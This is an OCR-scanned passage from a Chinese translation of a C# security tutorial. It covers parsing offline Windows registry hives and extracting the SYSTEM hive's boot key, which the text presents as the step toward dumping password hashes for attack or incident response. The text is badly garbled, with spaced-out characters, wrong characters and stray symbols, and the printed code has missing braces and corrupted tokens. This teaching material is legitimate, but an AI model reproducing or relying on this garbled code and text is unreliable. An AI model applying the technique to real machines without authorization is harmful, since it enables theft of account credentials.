行 循 环 塌 历 ， 直 到 它 找 到 给 定 的 节点 键 路 径 ， 然 后 返回 节操 键 。 


清单 14-15: GetNodeKey () 方法 


static NodeKey GetNodeKey(@RegistryHive hive, @string path ) 


{ 
Nodekey @node = null; 


string[] paths = path.@Split("'\\'); 
foreach (string ch in @paths) 
L 


if (node == null) 
node = hive.Rootkey; 


@foreach (NodeKey child in node.ChildNodes) 


if (child.Name == ch) 


node = child; 
break ; 


} 
} 


throw new Exception("No child found with name: ”+ ch); 


} 


@return node; 


} 


GetNodeKey () 方法 需要 两 个 参数 一 一 待 搜 索 的 注册 表 项 @， 以 及 需要 返回 的 节操 路 径 @ (以 反 斜 杠 符 号 分 隔 ) 。 在 对 
注册 表 树 进行 路 径 遍 历时 ， 首 先 声明 一 个 空 的 节点 @ 来 跟踪 我 们 的 位 置 ， 然 后 ， 在 每 个 反 斜 杠 符号 处 对 路 径 进行 分 隔 @@， 并 返回 
得 到 一 个 路 径 分 块 的 字符 串 数组 。 之 后 ， 对 每 个 路 径 分 块 进行 循环 处 理 ， 遍 历 注册 表 树 直至 在 路 径 结 尾 处 找到 节点 。 我 们 使 用 一 
个 foreach 循 环 进行 遍历 ， 该 循环 将 逐步 地 对 paths 数 组 © 中 的 每 个 路 径 分 块 进行 迭代 处 理 。 在 对 每 个 分 块 进行 迭代 处 理 的 过 程 
中 ， 我 们 在 foreach 循 环 @ 中 再 用 一 个 foreach 循 环 来 友 现 路 径 中 的 下 一 个 分 块 ， 直 至 找到 最 后 一 个 节操 。 最 后 ， 返 回 所 友 现 


的 节点。 


机 


机 


14.5.4 _ StringToByteArray () 方法 


最 后 ， 实 现 清单 14-13 中 所 用 的 StringToByteArray () 方法 ; 这 是 个 非 钊 简单 的 方法 ， 具 体 代码 详 见 清单 14-16。 
清单 14-16: GetBootKey () 方法 中 所 用 的 StringToByteArray () 方法 


static byte[] StringToByteArray(string s) 


return @Enumerable.Range(0, s.Length) 
.@Where(x => x % 2 == 0) 
.@Select(x => Convert.ToByte(s.Substring(x, 2), 16)) 
.ToArray(); 


StringToByteArray() 方法 使 用 语言 集成 查询 (LINQ) 来 将 每 个 两 字符 长 硫 的 字符 串 转 换 为 一 个 字 节 的 数值 。 比 如 ， 如 果 
传 入 的 字符 串 是 “FAAF”， 那 么 万 法 将 返回 一 个 内 容 为 {0xFA，0xAPF} 的 字 节 数组。 利用 Enumerable.Range () 万 法 @ 来 循环 
处 理 字符 串 中 的 每 一 个 字符 ,使 用 Where () 万 法 @ 来 跳 过 奇数 位 的 字符 ， 然 后 使 用 Select () 方法 @ 来 将 每 对 字符 转换 为 字符 
对 所 代表 的 字 节 数值 。 


14.5.5 ”获取 启动 密 钥 


最 后 ， 你 可 以 尝试 一 下 从 系统 表 项 中 导出 启动 密 钥 。 通 过 调用 新 的 GetBootKey () 方法 ， 可 以 将 之 前 用 来 打印 根 键 名 称 的 
Main () 方法 ， 蔡 换 重 写成 打印 启动 密 钥 。 上 有 具体 代码 参见 清单 14-17，。 


清单 14-17: 测试 GetBootKey () 方法 的 Main () 方法 


public static void Main(string[ | args ) 


lL 
RegistryHive systemHive = new @RegistryHive(args[0]); 
byte[ |] bootKkey = @GetBootKey(systemHive); 


@Console.WriteLine("Boot key: 
} 


+ BitConverter.ToString(bootkKey)); 


这 个 Main () 方法 将 打开 作为 唯一 参数 传递 给 程序 的 注册 表 项 @， 然 后 把 新 的 表 项 传递 给 GetBootKey () 方法 @@。 在 保 
存 新 的 启动 密 钥 之 后 ， 我 们 使 用 Console.WriteLine () 方法 @ 将 其 打印 到 屏幕 上 。 


然后 ， 可 以 运行 测试 代码 来 打印 局 动 密 钥 ， 结 果 如 清单 14-18 所 示 。 
清单 14-18: 运行 最 终 的 Main () 方法 


$ ./ch14 reading offline hives.exe >/Ssystem.hive 
Boot key: F8-C7-0D-21-3E-9D-E8-98-01-45-63-01-E4-F1-B4-1E 
$ 


正常 运行 显示 结果 了 ! 但 是 我 们 如 何 确定 这 丈 是 真正 的 启动 密 钥 呢 ? 


14.5.6 ”验证 启动 密 钥 


我 们 可 以 通过 将 代码 执行 结果 与 bkhive 工 具 (一 款 常 用 工具 ， 利 用 和 我 们 相同 的 原理 来 导出 系统 表 项 的 启动 密 钥 ) 的 结果 
相 比 较 ， 来 验证 我 们 的 代码 是 否 运 行 正 确 。 在 本 书 的 代码 仓库 (在 本 书页 面 链接 https://www.nostarch.com/grayhatcsharp 中 
可 以 找到 ) 中 包含 了 一 份 bkhive 工 具 的 源码 副本 。 针 对 我 们 已 经 测试 过 的 相同 的 注册 表 项 编译 并 运行 该 工具 可 以 验证 我 们 的 执 
行 结果 ， 如 清单 14-19 所 示 。 


清单 14-19: 验证 我 们 的 代码 所 返回 的 启动 密 钥 束 是 bkhive 工 具 所 打印 的 结果 


$ cd bkhive-1.1.1 

$ make 

$ ./bkhive ~/system.hive /dev/null 

bkhive 1.1.1 by Objectif Securite 
http://www.objectif-securite.ch 

original author: ncuomo@studenti.unina.it 


Root Key : CMI-CreateHive{2A7FB991-7BBE-4F9D-B91E-7CB51D4737F5} 
Default ControlSet: 001 

Bootkey: @f8c70d213e9de89801456301e4f1b41e 

$ 


bkhive 工 具 验 证 了 我 们 打造 的 启动 密 钥 导 出 器 运行 得 异常 成 功 ! 尽管 和 我 们 的 结果 相 比 ，bkhive 工 具 以 一 种 稍微 不 同 的 格 
式 (全 部 字符 小 写 ， 没 有 连 字符 ) 打印 局 动 密 钥 @， 它 所 打印 的 数据 仍 和 我 们 的 一 样 (F8C70D21...) 。 


你 可 能 会 疑惑 ， 为 什么 要 费 这 么 大 劲 编写 C# 类 来 导出 启动 密 钥 ， 我 们 明明 可 以 直接 使 用 bkhive 工 具 。bkhive 工 具 是 高 度 定 
制 的 ， 它 只 能 读 取 注 册 表 项 的 特定 部 分 ， 但 我 们 实现 的 类 可 以 用 来 读 取 注册 表 项 的 任意 部 分 ， 比 如 口令 散 列 值 ( 它 就 是 用 局 动 密 
钥 加 密 的 ! ) 和 补丁 级 别 信息 。 相 比 于 bkhive 工 具 我 们 的 类 更 加 灵活 ， 而 且 如 果 想 要 为 自己 的 应 用 程序 拓展 功能 的 话 ， 你 可 以 


以 此 作为 起 点 。 


14.6 本草 小 结 


对 于 一 个 天 注 于 攻击 或 事件 啊 应 的 注册 表 库 来 襄 ， 下 一 步 显 然 应 该 是 导出 实际 的 用 户 名 和 口令 获 询 值 。 获 取 局 动 密 钥 是 这 个 
过 程 中 最 困难 的 部 分 ， 但 它 也 是 唯一 需要 SYSTEM 注 册 表 项 的 步骤 。 相 应 地 ， 导 出 用 户 名 和 口令 获 列 值 需要 3AM 注 册 表 项 。 


读 取 注 册 表 项 (或 者 一 般 意 义 上 的 其 他 二 进 制 文件 格式 ) 是 一 项 需要 重点 培养 的 C# 语 言 编程 扩 能 。 事 件 响 应 和 攻击 方 的 安 
全 专家 通常 必须 能 够 实现 代码 来 读 取 解析 多 种 格式 的 二 进 制 数据 ， 可 能 是 在 线 环境 ， 也 可 能 是 磁盘 环境 。 在 本 章 中 ， 你 首先 学 习 
了 如 何 导出 注册 表 项 ， 这 样 我 们 束 可 以 将 它们 复制 到 另 一 台 主 机 上 并 对 其 进行 脱 机 读 取 。 然 后 ， 我 们 使 用 BinaryReader 对 和 象 实 
现 了 读 取 注册 表 项 的 类 。 通 过 构建 的 这 些 类 ， 我 们 可 以 读 取 脱 机 的 表 项 并 打印 根 键 名 称 。 然 后 ， 我 们 更 进一步 ， 从 系统 表 项 中 导 
出 存放 在 Windows 系 统 注 册 表 中 用 于 加 密 口 令 散 列 值 的 启动 密 钥 。 


